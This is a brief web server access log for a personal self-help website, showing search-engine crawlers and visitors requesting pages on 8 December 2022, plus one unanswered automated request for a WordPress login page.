64.124.8.26 - - [08/Dec/2022:04:48:24 -0800] "GET /author HTTP/1.1" 200 4638 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
40.77.167.105 - - [08/Dec/2022:05:02:06 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "mikemarino.us"
207.46.13.81 - - [08/Dec/2022:05:02:15 -0800] "GET /contact HTTP/1.1" 200 4154 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "mikemarino.us"
207.46.13.153 - - [08/Dec/2022:05:18:57 -0800] "GET /helpful_tips/14_common_traits_of_an_adult_child_of_an_alcoholic HTTP/1.1" 200 5530 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "mikemarino.us"
107.189.6.124 - - [08/Dec/2022:05:25:48 -0800] "GET /contact/ HTTP/1.1" 200 17847 "https://mikemarino.us/contact/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "mikemarino.us"
107.189.6.124 - - [08/Dec/2022:05:25:52 -0800] "GET /contact HTTP/1.1" 200 17847 "https://mikemarino.us/contact" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "mikemarino.us"
66.249.66.210 - - [08/Dec/2022:05:59:50 -0800] "GET /ads.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.mikemarino.us"
64.124.8.53 - - [08/Dec/2022:06:01:30 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
64.124.8.53 - - [08/Dec/2022:06:01:31 -0800] "GET /helpful_tips/getting_past_your_past HTTP/1.1" 200 6930 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
40.77.167.38 - - [08/Dec/2022:06:09:22 -0800] "GET /author HTTP/1.1" 200 4638 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "mikemarino.us"
64.124.8.53 - - [08/Dec/2022:06:18:58 -0800] "GET /helpful_tips/helping_kids_cope_with_trauma__loss HTTP/1.1" 200 5766 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
203.56.183.163 - - [08/Dec/2022:06:31:44 -0800] "GET /wp-login.php HTTP/1.1" 404 88 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_151)" "mikemarino.us"
